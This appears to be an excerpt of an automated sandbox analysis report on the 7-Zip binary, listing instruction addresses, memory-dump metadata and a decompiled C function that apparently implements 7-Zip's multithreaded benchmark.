                                                                                  0x00401824
                                                                                  0x0040182f
                                                                                  0x00401836
                                                                                  0x00401837
                                                                                  0x0040183e
                                                                                  0x0040183f
                                                                                  0x00401842
                                                                                  0x00401843
                                                                                  0x00401848
                                                                                  0x0040184b
                                                                                  0x0040184b
                                                                                  0x0040184b
                                                                                  0x00401824
                                                                                  0x0040184e
                                                                                  0x00401853
                                                                                  0x00401854
                                                                                  0x0040185a
                                                                                  0x00000000
                                                                                  0x0040180b
                                                                                  0x00401697
                                                                                  0x00401699
                                                                                  0x00401699
                                                                                  0x00401866
                                                                                  0x0040186c
                                                                                  0x00401874

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040167E
                                                                                    • Part of subcall function 00414B6B: __EH_prolog.LIBCMT ref: 00414B70
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: Avg:$ $ %5d$%2d: $CPU hardware threads:$size:
                                                                                  • API String ID: 3519838083-1473790758
                                                                                  • Opcode ID: b95e5d18777f8c829bc06347f2ade39e5bb4edbb476a6909730488946cc3f890
                                                                                  • Instruction ID: cf4bf7488a743daec15e4d6fa5ec6e5030c6436caeeb10ae79287eb816e5538f
                                                                                  • Opcode Fuzzy Hash: b95e5d18777f8c829bc06347f2ade39e5bb4edbb476a6909730488946cc3f890
                                                                                  • Instruction Fuzzy Hash: 7851B472D00208ABDB10EF65DC41AAE77B5EF44364F20842FF854B72D1DB7D99818B99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00414269 Relevance: 12.5, APIs: 8, Instructions: 493COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 87%
                                                                                  			E00414269(unsigned int __ecx, signed int __edx) {
				void* __edi;
				signed int _t241;
				signed int _t242;
				signed int _t247;
				signed int _t249;
				intOrPtr* _t262;
				signed int _t269;
				intOrPtr* _t280;
				signed int _t281;
				intOrPtr* _t289;
				intOrPtr* _t292;
				intOrPtr _t294;
				signed int _t295;
				signed int _t303;
				signed int _t309;
				signed int _t314;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				intOrPtr* _t327;
				unsigned int _t328;
				signed int _t383;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				void* _t401;
				intOrPtr _t404;
				signed int _t405;
				void* _t408;
				signed int _t409;
				intOrPtr* _t410;
				void* _t411;
				intOrPtr* _t422;

				_t378 = __edx;
				_t328 = __ecx;
				L0046B890(E00474718, _t411);
				_t241 = 1;
				 *(_t411 - 0x2c) = __edx;
				 *((intOrPtr*)(_t411 - 0x8c)) = __ecx;
				if(__ecx <= _t241) {
					_t389 = _t241;
				} else {
					_t389 = __ecx >> 1;
				}
				 *(_t411 - 0x1c) = _t389;
				 *(_t411 - 0x24) = (0 | _t328 - _t241 > 0x00000000) + 1;
				if(_t378 < 0x40000 || _t328 < _t241 || _t389 > 0x10000) {
					_t242 = 0x80070057;
				} else {
					_push(_t389);
					E00414920(_t411 - 0x18);
					_t398 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) & 0x00000000;
					 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
					_t323 = _t398;
					 *(_t411 - 0x20) = _t323;
					if(_t389 <= 0) {
						L17:
						 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
						 *((intOrPtr*)(_t411 - 0x94)) = 0x159a55e5;
						_t430 = _t389;
						 *((intOrPtr*)(_t411 - 0x90)) = 0x1f123bb5;
						if(_t389 <= 0) {
							L36:
							L00467C60(_t411 - 0x50);
							 *(_t411 - 0x38) =  *(_t411 - 0x38) & 0x00000000;
							 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
							 *(_t411 - 4) = 1;
							 *(_t411 - 0x34) = 1;
							if(_t389 <= 0) {
								L50:
								if(_t389 <= 1 || _t389 <= 0) {
									L54:
									_t399 = 0;
									if( *(_t411 - 0x38) == 0) {
										 *(_t411 - 0x58) = 0;
										L00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
										__eflags = _t389;
										 *((intOrPtr*)(_t411 - 0x68)) = 0;
										 *((intOrPtr*)(_t411 - 0x64)) = 0;
										 *((intOrPtr*)(_t411 - 0x60)) = 0;
										 *((intOrPtr*)(_t411 - 0x5c)) = 0;
										 *(_t411 - 0x58) = 1;
										if(_t389 <= 0) {
											L59:
											_t247 =  *((intOrPtr*)( *( *(_t411 + 8))))(_t411 - 0x88, 1);
											__eflags = _t247 - _t399;
											 *(_t411 - 0x2c) = _t247;
											if(_t247 == _t399) {
												 *(_t411 - 0x34) =  *(_t411 - 0x34) & 0x00000000;
												_t249 =  *(_t411 - 0x24) * _t389;
												__eflags = _t389 - _t399;
												 *(_t411 - 0x38) = _t399;
												 *(_t411 - 0x14) = _t249;
												 *(_t411 - 0x10) = _t399;
												if(_t389 <= _t399) {
													L78:
													__eflags = _t249 - 1;
													 *(_t411 - 0x14) = _t399;
													if(_t249 <= 1) {
														L94:
														_t400 =  *(_t411 - 0x38);
														__eflags = _t400;
														if(_t400 == 0) {
															L00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
															_t399 = 0;
															 *((intOrPtr*)(_t411 - 0x68)) = 0;
															 *((intOrPtr*)(_t411 - 0x64)) = 0;
															 *((intOrPtr*)(_t411 - 0x60)) = 0;
															 *((intOrPtr*)(_t411 - 0x5c)) = 0;
															__eflags = _t389;
															 *(_t411 - 0x58) =  *(_t323 + 0x1c) *  *(_t411 - 0x24);
															if(_t389 <= 0) {
																L101:
																_t391 =  *(_t411 + 8);
																_t324 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, _t399);
																__eflags = _t324 - _t399;
																if(_t324 == _t399) {
																	_t392 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, 1);
																	__eflags = _t392 - _t399;
																	_push(_t411 - 0x50);
																	if(_t392 == _t399) {
																		DeleteCriticalSection();
																		_t341 =  *(_t411 - 0x18);
																		 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																		__eflags =  *(_t411 - 0x18) - _t399;
																		if( *(_t411 - 0x18) != _t399) {
																			E0041415B(_t341, _t392, _t411, 3);
																		}
																		_t242 = 0;
																		L113:
																		 *[fs:0x0] =  *((intOrPtr*)(_t411 - 0xc));
																		return _t242;
																	}
																	L106:
																	DeleteCriticalSection();
																	_t342 =  *(_t411 - 0x18);
																	 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																	if( *(_t411 - 0x18) != _t399) {
																		E0041415B(_t342, _t392, _t411, 3);
																	}
																	_t242 = _t392;
																	goto L113;
																}
																DeleteCriticalSection(_t411 - 0x50);
																_t343 =  *(_t411 - 0x18);
																 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																__eflags =  *(_t411 - 0x18) - _t399;
																if( *(_t411 - 0x18) != _t399) {
																	E0041415B(_t343, _t391, _t411, 3);
																}
																_t242 = _t324;
																goto L113;
															}
															_t262 = _t323 + 0x68;
															do {
																 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t262 - 4));
																asm("adc [ebp-0x64], esi");
																 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t262;
																asm("adc [ebp-0x5c], esi");
																_t262 = _t262 + 0x84;
																_t389 = _t389 - 1;
																__eflags = _t389;
															} while (_t389 != 0);
															goto L101;
														}
														L95:
														DeleteCriticalSection(_t411 - 0x50);
														_t346 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t346, _t389, _t411, 3);
														}
														_t242 = _t400;
														goto L113;
													}
													__eflags = _t389;
													if(_t389 <= 0) {
														goto L94;
													}
													 *(_t411 - 0x20) = _t323;
													 *(_t411 - 0x1c) = _t389;
													do {
														__eflags =  *(_t411 - 0x24);
														if( *(_t411 - 0x24) <= 0) {
															goto L86;
														}
														_t401 = 0x4c;
														 *(_t411 - 0x28) =  *(_t411 - 0x24);
														do {
															L00467AC0( *((intOrPtr*)( *(_t411 - 0x20) + _t401 - 0x4c)));
															_t269 =  *( *(_t411 - 0x20) + _t401);
															__eflags = _t269;
															if(_t269 != 0) {
																 *(_t411 - 0x14) = _t269;
															}
															_t401 = _t401 + 4;
															_t185 = _t411 - 0x28;
															 *_t185 =  *(_t411 - 0x28) - 1;
															__eflags =  *_t185;
														} while ( *_t185 != 0);
														L86:
														 *(_t411 - 0x20) =  *(_t411 - 0x20) + 0x84;
														_t189 = _t411 - 0x1c;
														 *_t189 =  *(_t411 - 0x1c) - 1;
														__eflags =  *_t189;
													} while ( *_t189 != 0);
													__eflags =  *(_t411 - 0x14);
													if( *(_t411 - 0x14) == 0) {
														goto L94;
													}
													DeleteCriticalSection(_t411 - 0x50);
													_t348 =  *(_t411 - 0x18);
													 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
													__eflags =  *(_t411 - 0x18);
													if( *(_t411 - 0x18) != 0) {
														E0041415B(_t348, _t389, _t411, 3);
													}
													_t242 =  *(_t411 - 0x14);
													goto L113;
												} else {
													goto L64;
												}
												do {
													L64:
													_t404 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
													_t389 = 0;
													_t383 = 0x4000000 %  *(_t404 + 0x64);
													__eflags =  *(_t411 - 0x10);
													 *((intOrPtr*)(_t404 + 0x1c)) = 0x4000000 /  *(_t404 + 0x64) + 2;
													if( *(_t411 - 0x10) == 0) {
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x4c) =  *(_t411 + 8);
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x40) =  *(_t411 - 0x14);
														__eflags =  *((intOrPtr*)(_t404 + 0xc)) + 0x10;
														E00414885( *((intOrPtr*)(_t404 + 0xc)) + 0x10, _t383);
													}
													__eflags =  *(_t411 - 0x14) - 1;
													if( *(_t411 - 0x14) <= 1) {
														_push(_t389);
														_t400 = L00413EF3(_t404);
														__eflags = _t400 - _t389;
														if(_t400 != _t389) {
															goto L95;
														}
													} else {
														__eflags =  *(_t411 - 0x24) - _t389;
														if( *(_t411 - 0x24) <= _t389) {
															goto L76;
														}
														_t326 =  *(_t411 - 0x10) *  *(_t411 - 0x24);
														__eflags = _t326;
														while(1) {
															__eflags =  *(_t411 - 0x10);
															if( *(_t411 - 0x10) == 0) {
																__eflags = _t389;
																if(_t389 == 0) {
																	_push(1);
																	_pop(0);
																}
															}
															_t280 = (_t389 << 4) + _t404 + 0x24;
															 *(_t280 + 8) = (_t326 + _t389) * 0x00000150 & 0x000007ff;
															 *((char*)(_t280 + 0xc)) = 0;
															 *(_t280 + 4) = _t389;
															 *_t280 = _t404;
															_t281 = E00467AD0(_t404 + _t389 * 4, E004148ED, _t280);
															__eflags = _t281;
															 *(_t411 - 0x2c) = _t281;
															if(_t281 != 0) {
																break;
															}
															_t389 = _t389 + 1;
															__eflags = _t389 -  *(_t411 - 0x24);
															if(_t389 <  *(_t411 - 0x24)) {
																continue;
															}
															goto L76;
														}
														DeleteCriticalSection(_t411 - 0x50);
														_t352 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t352, _t389, _t411, 3);
														}
														_t242 =  *(_t411 - 0x2c);
														goto L113;
													}
													L76:
													 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
													__eflags =  *(_t411 - 0x10) -  *(_t411 - 0x1c);
												} while ( *(_t411 - 0x10) <  *(_t411 - 0x1c));
												_t323 =  *(_t411 - 0x20);
												_t249 =  *(_t411 - 0x14);
												_t389 =  *(_t411 - 0x1c);
												_t399 = 0;
												__eflags = 0;
												goto L78;
											}
											DeleteCriticalSection(_t411 - 0x50);
											_t357 =  *(_t411 - 0x18);
											 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
											__eflags =  *(_t411 - 0x18) - _t399;
											if( *(_t411 - 0x18) != _t399) {
												E0041415B(_t357, _t389, _t411, 3);
											}
											_t242 =  *(_t411 - 0x2c);
											goto L113;
										}
										_t289 = _t323 + 0x68;
										 *(_t411 - 0x14) = _t389;
										do {
											 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t289 - 4));
											asm("adc [ebp-0x64], esi");
											 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t289;
											asm("adc [ebp-0x5c], esi");
											_t289 = _t289 + 0x84;
											_t118 = _t411 - 0x14;
											 *_t118 =  *(_t411 - 0x14) - 1;
											__eflags =  *_t118;
										} while ( *_t118 != 0);
										goto L59;
									}
									_t392 =  *(_t411 - 0x38);
									_push(_t411 - 0x50);
									goto L106;
								} else {
									_t405 = _t323;
									 *(_t411 - 0x14) = _t389;
									do {
										L00467AC0( *_t405);
										_t405 = _t405 + 0x84;
										_t98 = _t411 - 0x14;
										 *_t98 =  *(_t411 - 0x14) - 1;
									} while ( *_t98 != 0);
									goto L54;
								}
							} else {
								goto L37;
							}
							do {
								L37:
								 *(_t411 - 0x14) = 2;
								_t408 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
								_t393 = _t408 + 0xc;
								_t327 = _t393;
								do {
									_push(0x50);
									_t292 = L004079F2();
									if(_t292 == 0) {
										_t292 = 0;
										__eflags = 0;
									} else {
										 *((intOrPtr*)(_t292 + 4)) = 0;
										 *((intOrPtr*)(_t292 + 0x40)) = 0;
										 *((intOrPtr*)(_t292 + 0x4c)) = 0;
										 *_t292 = 0x47aaf4;
									}
									 *_t327 = _t292;
									E0040C9B4(_t327 + 8, _t292);
									_t294 =  *_t327;
									_t327 = _t327 + 4;
									_t81 = _t411 - 0x14;
									 *_t81 =  *(_t411 - 0x14) - 1;
									 *((intOrPtr*)(_t294 + 8)) = _t411 - 0x50;
								} while ( *_t81 != 0);
								if( *(_t411 - 0x10) == 0) {
									 *( *_t393 + 0x4c) =  *(_t411 + 8);
									 *( *_t393 + 0x40) =  *(_t411 - 0x1c);
									E00414885( *_t393 + 0x10, _t378);
								}
								_t389 =  *(_t411 - 0x1c);
								if(_t389 <= 1) {
									_t295 = L00413E35(_t408);
								} else {
									_t378 = E004148B5;
									 *(_t408 + 0x20) =  *(_t411 - 0x10) * 0x00000150 & 0x000007ff;
									_t295 = E00467AD0(_t408, E004148B5, _t408);
								}
								_t400 = _t295;
								if(_t400 != 0) {
									goto L95;
								}
								 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							} while ( *(_t411 - 0x10) < _t389);
							_t323 =  *(_t411 - 0x20);
							_t389 =  *(_t411 - 0x1c);
							goto L50;
						}
						_t409 = _t323;
						while(1) {
							_push(_t411 - 0x94);
							_push( *((intOrPtr*)(_t411 - 0x8c)));
							_push( *(_t411 - 0x2c));
							_t303 = L00413A0D(_t409, _t430);
							 *(_t411 - 0x30) = _t303;
							if(_t303 != 0) {
								break;
							}
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t409 = _t409 + 0x84;
							if( *(_t411 - 0x10) < _t389) {
								continue;
							}
							goto L36;
						}
						_t372 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t372, _t389, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t410 = _t398 + 8;
					_t422 = _t410;
					while(1) {
						_push(0);
						asm("sbb eax, eax");
						_t378 = 1;
						_push(0x30101);
						 *(_t410 + 0x54) =  !( ~( *(_t411 - 0x10))) &  *(_t411 + 8);
						_t309 = E0040C964(_t410, 1, _t422);
						 *(_t411 - 0x14) = _t309;
						if(_t309 != 0) {
							break;
						}
						if( *_t410 == _t309) {
							_t375 =  *(_t411 - 0x18);
							 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
							__eflags =  *(_t411 - 0x18) - _t309;
							L30:
							if(__eflags != 0) {
								E0041415B(_t375, 0x30101, _t411, 3);
							}
							_t242 = 0x80004001;
							goto L113;
						}
						_t425 =  *(_t411 - 0x24) - _t309;
						 *(_t411 - 0x14) = _t309;
						if( *(_t411 - 0x24) <= _t309) {
							L15:
							 *(_t411 - 0x10) =  *(_t411 - 0x10) + 1;
							_t410 = _t410 + 0x84;
							if( *(_t411 - 0x10) <  *(_t411 - 0x1c)) {
								continue;
							}
							_t389 =  *(_t411 - 0x1c);
							goto L17;
						}
						 *(_t411 - 0x28) = _t410 + 0x3c;
						while(1) {
							_push(0);
							_t378 = 0;
							_push(0x30101);
							_t314 = E0040C964( *(_t411 - 0x28), 0, _t425);
							 *(_t411 - 0x30) = _t314;
							if(_t314 != 0) {
								break;
							}
							if( *( *(_t411 - 0x28)) == 0) {
								_t375 =  *(_t411 - 0x18);
								 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
								__eflags =  *(_t411 - 0x18);
								goto L30;
							}
							 *(_t411 - 0x14) =  *(_t411 - 0x14) + 1;
							 *(_t411 - 0x28) =  *(_t411 - 0x28) + 4;
							if( *(_t411 - 0x14) <  *(_t411 - 0x24)) {
								continue;
							}
							goto L15;
						}
						_t377 =  *(_t411 - 0x18);
						 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
						__eflags =  *(_t411 - 0x18);
						if( *(_t411 - 0x18) != 0) {
							E0041415B(_t377, 0x30101, _t411, 3);
						}
						_t242 =  *(_t411 - 0x30);
						goto L113;
					}
					_t374 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
					__eflags =  *(_t411 - 0x18);
					if( *(_t411 - 0x18) != 0) {
						E0041415B(_t374, 0x30101, _t411, 3);
					}
					_t242 =  *(_t411 - 0x14);
				}
			}








































                                                                                  0x00414269
                                                                                  0x00414269
                                                                                  0x0041426e
                                                                                  0x0041427e
                                                                                  0x0041427f
                                                                                  0x00414284
                                                                                  0x0041428a
                                                                                  0x00414292
                                                                                  0x0041428c
                                                                                  0x0041428e
                                                                                  0x0041428e
                                                                                  0x004142a2
                                                                                  0x004142a5
                                                                                  0x004142a8
                                                                                  0x00414857
                                                                                  0x004142c2
                                                                                  0x004142c2
                                                                                  0x004142c6
                                                                                  0x004142cb
                                                                                  0x004142ce
                                                                                  0x004142d2
                                                                                  0x004142d6
                                                                                  0x004142da
                                                                                  0x004142dd
                                                                                  0x0041436e
                                                                                  0x0041436e
                                                                                  0x00414372
                                                                                  0x0041437c
                                                                                  0x0041437e
                                                                                  0x00414388
                                                                                  0x00414433
                                                                                  0x00414436
                                                                                  0x0041443b
                                                                                  0x0041443f
                                                                                  0x00414445
                                                                                  0x00414449
                                                                                  0x0041444d
                                                                                  0x00414512
                                                                                  0x00414515
                                                                                  0x00414532
                                                                                  0x00414532
                                                                                  0x00414537
                                                                                  0x00414545
                                                                                  0x00414554
                                                                                  0x00414559
                                                                                  0x0041455b
                                                                                  0x0041455e
                                                                                  0x00414561
                                                                                  0x00414564
                                                                                  0x00414567
                                                                                  0x0041456e
                                                                                  0x00414591
                                                                                  0x0041459f
                                                                                  0x004145a1
                                                                                  0x004145a3
                                                                                  0x004145a6
                                                                                  0x004145cf
                                                                                  0x004145d3
                                                                                  0x004145d6
                                                                                  0x004145d8
                                                                                  0x004145db
                                                                                  0x004145de
                                                                                  0x004145e1
                                                                                  0x004146b6
                                                                                  0x004146b6
                                                                                  0x004146b9
                                                                                  0x004146bc
                                                                                  0x0041475a
                                                                                  0x0041475a
                                                                                  0x0041475d
                                                                                  0x0041475f
                                                                                  0x00414790
                                                                                  0x00414795
                                                                                  0x00414797
                                                                                  0x0041479a
                                                                                  0x0041479d
                                                                                  0x004147a0
                                                                                  0x004147aa
                                                                                  0x004147ac
                                                                                  0x004147af
                                                                                  0x004147cd
                                                                                  0x004147cd
                                                                                  0x004147df
                                                                                  0x004147e1
                                                                                  0x004147e3
                                                                                  0x00414815
                                                                                  0x0041481a
                                                                                  0x0041481c
                                                                                  0x0041481d
                                                                                  0x0041483b
                                                                                  0x00414841
                                                                                  0x00414844
                                                                                  0x00414848
                                                                                  0x0041484a
                                                                                  0x0041484e
                                                                                  0x0041484e
                                                                                  0x00414853
                                                                                  0x0041485c
                                                                                  0x00414862
                                                                                  0x0041486a
                                                                                  0x0041486a
                                                                                  0x0041481f
                                                                                  0x0041481f
                                                                                  0x00414825
                                                                                  0x00414828
                                                                                  0x0041482e
                                                                                  0x00414832
                                                                                  0x00414832
                                                                                  0x00414837
                                                                                  0x00000000
                                                                                  0x00414837
                                                                                  0x004147e9
                                                                                  0x004147ef
                                                                                  0x004147f2
                                                                                  0x004147f6
                                                                                  0x004147f8
                                                                                  0x004147fc
                                                                                  0x004147fc
                                                                                  0x00414801
                                                                                  0x00000000
                                                                                  0x00414801
                                                                                  0x004147b1
                                                                                  0x004147b4
                                                                                  0x004147b7
                                                                                  0x004147ba
                                                                                  0x004147bf
                                                                                  0x004147c2
                                                                                  0x004147c5
                                                                                  0x004147ca
                                                                                  0x004147ca
                                                                                  0x004147ca
                                                                                  0x00000000
                                                                                  0x004147b4
                                                                                  0x00414761
                                                                                  0x00414765
                                                                                  0x0041476b
                                                                                  0x0041476e
                                                                                  0x00414772
                                                                                  0x00414774
                                                                                  0x00414778
                                                                                  0x00414778
                                                                                  0x0041477d
                                                                                  0x00000000
                                                                                  0x0041477d
                                                                                  0x004146c2
                                                                                  0x004146c4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004146ca
                                                                                  0x004146cd
                                                                                  0x004146d0
                                                                                  0x004146d0
                                                                                  0x004146d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004146db
                                                                                  0x004146dc
                                                                                  0x004146df
                                                                                  0x004146e6
                                                                                  0x004146ee
                                                                                  0x004146f1
                                                                                  0x004146f3
                                                                                  0x004146f5
                                                                                  0x004146f5
                                                                                  0x004146f8
                                                                                  0x004146fb
                                                                                  0x004146fb
                                                                                  0x004146fb
                                                                                  0x004146fb
                                                                                  0x00414700
                                                                                  0x00414700
                                                                                  0x00414707
                                                                                  0x00414707
                                                                                  0x00414707
                                                                                  0x00414707
                                                                                  0x0041470c
                                                                                  0x00414710
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414716
                                                                                  0x0041471c
                                                                                  0x0041471f
                                                                                  0x00414723
                                                                                  0x00414725
                                                                                  0x00414729
                                                                                  0x00414729
                                                                                  0x0041472e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004145e7
                                                                                  0x004145e7
                                                                                  0x004145f5
                                                                                  0x004145fa
                                                                                  0x004145fc
                                                                                  0x00414601
                                                                                  0x00414604
                                                                                  0x00414607
                                                                                  0x0041460f
                                                                                  0x00414618
                                                                                  0x0041461e
                                                                                  0x00414621
                                                                                  0x00414621
                                                                                  0x00414626
                                                                                  0x0041462a
                                                                                  0x0041468a
                                                                                  0x00414692
                                                                                  0x00414694
                                                                                  0x00414696
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041462c
                                                                                  0x0041462c
                                                                                  0x0041462f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414634
                                                                                  0x00414634
                                                                                  0x00414638
                                                                                  0x0041463a
                                                                                  0x0041463d
                                                                                  0x0041463f
                                                                                  0x00414641
                                                                                  0x00414643
                                                                                  0x00414645
                                                                                  0x00414645
                                                                                  0x00414641
                                                                                  0x0041465a
                                                                                  0x0041465f
                                                                                  0x00414662
                                                                                  0x0041466d
                                                                                  0x00414670
                                                                                  0x00414672
                                                                                  0x00414677
                                                                                  0x00414679
                                                                                  0x0041467c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414682
                                                                                  0x00414683
                                                                                  0x00414686
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414688
                                                                                  0x0041473a
                                                                                  0x00414740
                                                                                  0x00414743
                                                                                  0x00414747
                                                                                  0x00414749
                                                                                  0x0041474d
                                                                                  0x0041474d
                                                                                  0x00414752
                                                                                  0x00000000
                                                                                  0x00414752
                                                                                  0x0041469c
                                                                                  0x0041469c
                                                                                  0x004146a2
                                                                                  0x004146a2
                                                                                  0x004146ab
                                                                                  0x004146ae
                                                                                  0x004146b1
                                                                                  0x004146b4
                                                                                  0x004146b4
                                                                                  0x00000000
                                                                                  0x004146b4
                                                                                  0x004145ac
                                                                                  0x004145b2
                                                                                  0x004145b5
                                                                                  0x004145b9
                                                                                  0x004145bb
                                                                                  0x004145bf
                                                                                  0x004145bf
                                                                                  0x004145c4
                                                                                  0x00000000
                                                                                  0x004145c4
                                                                                  0x00414570
                                                                                  0x00414573
                                                                                  0x00414576
                                                                                  0x00414579
                                                                                  0x0041457c
                                                                                  0x00414581
                                                                                  0x00414584
                                                                                  0x00414587
                                                                                  0x0041458c
                                                                                  0x0041458c
                                                                                  0x0041458c
                                                                                  0x0041458c
                                                                                  0x00000000
                                                                                  0x00414576
                                                                                  0x00414539
                                                                                  0x0041453f
                                                                                  0x00000000
                                                                                  0x0041451b
                                                                                  0x0041451b
                                                                                  0x0041451d
                                                                                  0x00414520
                                                                                  0x00414522
                                                                                  0x00414527
                                                                                  0x0041452d
                                                                                  0x0041452d
                                                                                  0x0041452d
                                                                                  0x00000000
                                                                                  0x00414520
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414453
                                                                                  0x00414453
                                                                                  0x00414456
                                                                                  0x00414463
                                                                                  0x00414466
                                                                                  0x00414469
                                                                                  0x0041446b
                                                                                  0x0041446b
                                                                                  0x0041446d
                                                                                  0x00414475
                                                                                  0x0041448a
                                                                                  0x0041448a
                                                                                  0x00414477
                                                                                  0x00414479
                                                                                  0x0041447c
                                                                                  0x0041447f
                                                                                  0x00414482
                                                                                  0x00414482
                                                                                  0x00414490
                                                                                  0x00414492
                                                                                  0x00414497
                                                                                  0x0041449c
                                                                                  0x0041449f
                                                                                  0x0041449f
                                                                                  0x004144a2
                                                                                  0x004144a2
                                                                                  0x004144ab
                                                                                  0x004144b2
                                                                                  0x004144ba
                                                                                  0x004144c2
                                                                                  0x004144c2
                                                                                  0x004144c7
                                                                                  0x004144cd
                                                                                  0x004144f1
                                                                                  0x004144cf
                                                                                  0x004144de
                                                                                  0x004144e5
                                                                                  0x004144e8
                                                                                  0x004144e8
                                                                                  0x004144f6
                                                                                  0x004144fa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414500
                                                                                  0x00414503
                                                                                  0x0041450c
                                                                                  0x0041450f
                                                                                  0x00000000
                                                                                  0x0041450f
                                                                                  0x0041438e
                                                                                  0x00414390
                                                                                  0x00414398
                                                                                  0x00414399
                                                                                  0x0041439f
                                                                                  0x004143a2
                                                                                  0x004143a9
                                                                                  0x004143ac
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004143ae
                                                                                  0x004143b1
                                                                                  0x004143ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004143bc
                                                                                  0x00414419
                                                                                  0x0041441c
                                                                                  0x00414420
                                                                                  0x00414422
                                                                                  0x00414426
                                                                                  0x00414426
                                                                                  0x0041442b
                                                                                  0x00000000
                                                                                  0x0041442b
                                                                                  0x004142e3
                                                                                  0x004142e3
                                                                                  0x004142eb
                                                                                  0x004142ee
                                                                                  0x004142f2
                                                                                  0x004142f4
                                                                                  0x004142fd
                                                                                  0x004142fe
                                                                                  0x00414301
                                                                                  0x00414308
                                                                                  0x0041430b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00414313
                                                                                  0x004143d8
                                                                                  0x004143db
                                                                                  0x004143df
                                                                                  0x00414406
                                                                                  0x00414406
                                                                                  0x0041440a
                                                                                  0x0041440a
                                                                                  0x0041440f
                                                                                  0x00000000
                                                                                  0x0041440f
                                                                                  0x00414319
                                                                                  0x0041431c
                                                                                  0x0041431f
                                                                                  0x0041435a
                                                                                  0x0041435a
                                                                                  0x0041435d
                                                                                  0x00414369
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041436b
                                                                                  0x00000000
